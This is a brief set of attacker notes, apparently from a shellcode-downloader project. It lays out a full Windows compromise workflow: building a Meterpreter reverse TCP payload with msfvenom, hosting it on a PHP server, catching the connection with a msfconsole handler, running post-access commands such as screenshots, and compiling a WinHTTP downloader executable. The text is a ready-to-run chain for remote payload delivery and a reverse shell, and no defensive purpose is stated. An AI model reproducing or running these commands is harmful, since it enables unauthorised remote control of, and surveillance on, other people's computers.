//create msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={IP} LPORT=4444 -f raw -o shellcode.bin
//host php -S 0.0.0.0:80
//listen msfconsole -x "use exploits/multi/handler; set lhost {IP}; set lport 4444; set payload windows/x64/meterpreter/reverse_tcp; exploit"
//after access $sysinfo $cd / $screenshot $feh {path to screenshot}
//execute x86_64-w64-mingw32-g++ -o downloader.exe vuln.cpp -lwinhttp -static
Useful Links:
